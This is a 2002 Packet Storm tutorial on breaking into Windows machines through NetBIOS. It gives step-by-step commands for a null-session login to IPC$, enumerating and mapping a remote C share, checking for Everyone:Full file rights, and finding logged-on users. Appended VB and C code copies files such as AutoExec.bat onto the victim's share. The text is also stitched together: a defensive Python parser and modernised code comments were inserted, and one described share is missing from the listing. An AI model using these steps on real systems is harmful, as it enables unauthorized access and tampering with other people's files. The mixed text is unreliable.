Posted Dec 4, 2002
Authored by r-22 | Site manshadow.org

How to hack Windows machines with NetBIOS.

tags | paper
systems | windows
MD5 | 08d4d8c8dda620c876b55020887ae2ba


NetBIOS Usage Tutorial
date: 08.20.01
written by: r-22
e-mail: admin@manshadow.org

NetBIOS is that handy facility that allows remote access to a Windows system
and its files. Who would have thought that Microsoft would have set up the
biggest opening for unauthorized remote access to a Windows system? Well,
maybe I should first explain in a little more detail what it is and does.
With NetBIOS you have what are called shares. Shares are named either by default
or however the administrator decides, and each share represents a directory on
the system that exports it. For example, the defaults on an NT system are C$,
IPC$ and ADMIN$. As you would expect, C$ is a share for the C:\ drive and ADMIN$
is for remote administration of the server. So what the hell is IPC$? To my
understanding it is the share one system uses when it needs to talk to another
system over NetBIOS at the system level. It just so happens that you can sometimes
trick the NetBIOS server into thinking you have rights to access the system by
making it believe you are a system: the technique is to log into the IPC$ share
with a NULL username and password. You can do this programmatically or from plain
DOS, and there may be other methods as well. The DOS command for logging into
shares is the net command. net is useful for a lot of things, but we'll only deal
with share mapping for now. The syntax is:

net use [\\computername | \\ip][\share name]["password"][/user:"username"]

To establish a null IPC session you would do something like (<ip> stands for the
address of the remote machine):

net use \\<ip>\ipc$ "" /user:""

This says: use the share ipc$ on <ip> with no password and no username. If it
worked you should see "The command completed successfully." Now we want to see
what exactly they are sharing. For that you use the net view command; the
syntax is:

net view [\\computer name | \\ip]

For example:

net view \\<ip>

This asks for the list of shares on that machine. You should see something like
this:

Share name   Type   Used as   Comment

C            Disk
D            Disk
E            Disk
The command completed successfully.

Notice the C, D, E and HP DESKJET 6: those are the shares on this particular
machine. Sometimes the listing shows the default shares and sometimes it doesn't.
The only pattern I can make out is that if there are no user-defined shares it
shows the defaults, and if there are user-defined shares it shows only those.
Now we want to access C. Using a variation on the net use command from above we
can do:

net use * \\<ip>\C

This maps the C share from <ip> onto my machine. So what is the *? It means the
local drive letter for the share will be the next free one in the list of drive
letters. So on my system I would see:

F:\ (connected to C on <ip>)

That means my F:\ is the remote system's C:\, and when I view or modify the
contents of my F:\ I am really viewing the contents of C:\ on the remote machine.
You can check file access rights with a command called cacls, which works basically
like the dir command. You would use something like cacls autoexec.bat, and what you
are looking for in this case is the Everyone account being set with the F flag, which
means Everyone has Full access. Now it's time to see who else is logged in.
This uses the nbtstat command with the -a switch, something like:

nbtstat -a <ip>

which will show results like this:

Local Area Connection:
Node IpAddress: [] Scope Id: []

NetBIOS Remote Machine Name Table

    Name               Type         Status
    GIOVE          <00>  UNIQUE      Registered
    REGNONERO      <00>  GROUP       Registered
    GIOVE          <03>  UNIQUE      Registered
    GIOVE          <20>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered

MAC Address = 44-45-53-54-00-00

This looks like a bunch of junk, but it's actually useful. You just need a table
to understand what all the information means. Here's the table:

Name                Number  Type  Usage
<computername>      00      U     Workstation Service
<computername>      01      U     Messenger Service
<\\_MSBROWSE_>      01      G     Master Browser
<computername>      03      U     Messenger Service
<computername>      06      U     RAS Server Service
<computername>      1F      U     NetDDE Service
<computername>      20      U     File Server Service
<computername>      21      U     RAS Client Service
<computername>      22      U     Exchange Interchange
<computername>      23      U     Exchange Store
<computername>      24      U     Exchange Directory
<computername>      30      U     Modem Sharing Server Service
<computername>      31      U     Modem Sharing Client Service
<computername>      43      U     SMS Client Remote Control
<computername>      44      U     SMS Admin Remote Control Tool
<computername>      45      U     SMS Client Remote Chat
<computername>      46      U     SMS Client Remote Transfer
<computername>      4C      U     DEC Pathworks TCPIP Service
<computername>      52      U     DEC Pathworks TCPIP Service
<computername>      87      U     Exchange MTA
<computername>      6A      U     Exchange IMC
<computername>      BE      U     Network Monitor Agent
<computername>      BF      U     Network Monitor Apps
<username>          03      U     Messenger Service
<domain>            00      G     Domain Name
<domain>            1B      U     Domain Master Browser
<domain>            1C      G     Domain Controllers
<domain>            1D      U     Master Browser
<domain>            1E      G     Browser Service Elections
<INet~Services>     1C      G     Internet Information Server
<IS~Computer_name>  00      U     Internet Information Server
<computername>      2B      U     Lotus Notes Server
Forte_$ND800ZA      20      U     DCA Irmalan Gateway Service

If you look at the nbtstat printout you will see that GIOVE has an entry for 03
and UNIQUE. Now look at the table and see what that means. We'll assume that GIOVE
is a username; the table says 03 is the Messenger Service, and that means someone
is logged into the system at the time. You can now send messages to the remote
system using the net send command. In this case I would do something like:

net send giove test

which sends the message "test" to the user GIOVE on the system. You may also use
IP addresses in place of the name to send messages.
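As an added example (not part of the tutorial), here is a Python parser that decodes an nbtstat -a dump with the suffix table above, the kind of thing a defender can run over their own hosts to see what each one advertises: the computer and domain names, whether the File Server Service (<20>) is registered, and which <03> Messenger entries carry a name other than the computer name and so point to a logged-on user. The sample dump is constructed from the one shown above with an added JSMITH row.

```python
import re

# Suffix meanings from the table in the tutorial above, keyed by (type, hex suffix).
SUFFIXES = {
    ("UNIQUE", "00"): "Workstation Service", ("UNIQUE", "03"): "Messenger Service",
    ("UNIQUE", "20"): "File Server Service", ("UNIQUE", "1B"): "Domain Master Browser",
    ("GROUP", "00"): "Domain Name", ("GROUP", "01"): "Master Browser",
    ("GROUP", "1C"): "Domain Controllers", ("GROUP", "1E"): "Browser Service Elections",
}
# One row of the "NetBIOS Remote Machine Name Table": NAME<hh>  UNIQUE|GROUP  Status
ROW_RE = re.compile(r"^\s*(\S+?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)\s*$")

def parse_nbtstat(text):
    """Decode an 'nbtstat -a' dump into the facts a defender wants from it."""
    rows = [m.groups() for m in map(ROW_RE.match, text.splitlines()) if m]
    rows = [(n, s.upper(), k, st) for n, s, k, st in rows if st == "Registered"]
    computer = next((n for n, s, k, _ in rows if (k, s) == ("UNIQUE", "00")), None)
    info = {"computer": computer, "domain": None, "file_sharing": False,
            "master_browser": False, "logged_on_users": [], "names": []}
    for name, suffix, kind, _ in rows:
        info["names"].append((name, suffix, SUFFIXES.get((kind, suffix), "unknown")))
        if (kind, suffix) == ("GROUP", "00"):
            info["domain"] = name                 # workgroup/domain the host belongs to
        elif kind == "GROUP" and "__MSBROWSE__" in name:
            info["master_browser"] = True         # host is the segment's master browser
        elif (kind, suffix) == ("UNIQUE", "20"):
            info["file_sharing"] = True           # File Server Service: shares are exposed
        elif (kind, suffix) == ("UNIQUE", "03") and name != computer:
            info["logged_on_users"].append(name)  # Messenger registration of a user
    return info

# Constructed sample modelled on the dump in the tutorial; the JSMITH row is added
# here so that the logged-on-user case is exercised.
SAMPLE = """\
    NetBIOS Remote Machine Name Table

       Name               Type         Status
    GIOVE          <00>  UNIQUE      Registered
    REGNONERO      <00>  GROUP       Registered
    GIOVE          <03>  UNIQUE      Registered
    GIOVE          <20>  UNIQUE      Registered
    JSMITH         <03>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered

    MAC Address = 44-45-53-54-00-00
"""

if __name__ == "__main__":
    for key, value in parse_nbtstat(SAMPLE).items():
        print(f"{key}: {value}")
```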


VB and C source code for NetBIOS Transfers
appended: 12.01.02
coded by: r-22
e-mail: admin@manshadow.org

VB Source:
' BLOCK_SIZE is not defined in the original listing; 4096 is assumed here.
Private Const BLOCK_SIZE As Long = 4096

' Copies sFileOrig to sFileNew in BLOCK_SIZE chunks. Returns 1 on success, 0 on error.
Private Function BlockCopy(sFileOrig As String, sFileNew As String) As Long
    On Error GoTo ErrTrap
    Dim bOrig(1 To BLOCK_SIZE) As Byte, bNew() As Byte
    Dim nOpenOrig As Integer, nOpenNew As Integer
    Dim lBlocks As Long, lRest As Long, lK As Long
    nOpenOrig% = FreeFile
    Open sFileOrig$ For Binary Access Read As #nOpenOrig%
    ' Number of full blocks and the size of the trailing partial block.
    lBlocks& = LOF(nOpenOrig%) \ BLOCK_SIZE
    lRest& = LOF(nOpenOrig%) Mod BLOCK_SIZE
    ' Create or truncate the destination, then reopen it for binary writing.
    nOpenNew% = FreeFile
    Open sFileNew$ For Output As #nOpenNew%
    Close #nOpenNew%
    nOpenNew% = FreeFile
    Open sFileNew$ For Binary Access Write As #nOpenNew%
    Seek #nOpenOrig%, 1
    For lK& = 1 To lBlocks&
        Get #nOpenOrig%, , bOrig()
        Put #nOpenNew%, , bOrig()
    Next lK&
    If lRest& > 0 Then
        ReDim bNew(1 To lRest&) As Byte
        Get #nOpenOrig%, , bNew()
        Put #nOpenNew%, , bNew()
    End If
    Close #nOpenOrig%
    Close #nOpenNew%
    BlockCopy& = 1
    Exit Function
ErrTrap:
    Close
    BlockCopy& = 0
End Function

'/* Usage: lRet& = MoveNetBIOS("<ip>", "C:\AutoExec.bat", "C:\AutoExec.bat") */
' Builds the UNC path \\<ip>\C\AutoExec.bat from the drive-letter path, i.e. it
' writes to a share named after the drive letter (the "C" share seen with net view).
Public Function MoveNetBIOS(sIP As String, sFileFrom As String, sFileTo As String) As Long
    On Error GoTo ErrTrap
    Dim sUNC As String
    sUNC$ = "\\" & sIP$ & "\" & Replace$(sFileTo$, ":", "")
    MoveNetBIOS& = BlockCopy(sFileFrom$, sUNC$)
    Exit Function
ErrTrap:
    MoveNetBIOS& = 0
End Function

C Source:
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Copies file_from to \\ip_addr\file_to, where file_to is a share-relative path
 * such as "C\AutoExec.bat" (the "C" share seen with net view).
 * Returns 1 on success, 0 on failure. */
int MoveNetBIOS(const char *ip_addr, const char *file_from, const char *file_to)
{
    char file_name[MAX_PATH];

    /* snprintf bounds the UNC path; the original strcpy/strcat chain could overflow. */
    if (snprintf(file_name, sizeof file_name, "\\\\%s\\%s", ip_addr, file_to)
            >= (int)sizeof file_name)
        return 0;
    if (!CopyFile(file_from, file_name, FALSE)) {
        fprintf(stderr, "CopyFile failed: %lu\n", GetLastError());
        return 0;
    }
    return 1;
}

int main(int argc, char *argv[])
{
    (void)argc; (void)argv;
    /* "<ip>" is a placeholder: the address was stripped from the original listing. */
    return MoveNetBIOS("<ip>", "C:\\AutoExec.bat", "C\\AutoExec.bat") ? 0 : 1;
}

packet storm

© 2019 Packet Storm. All rights reserved.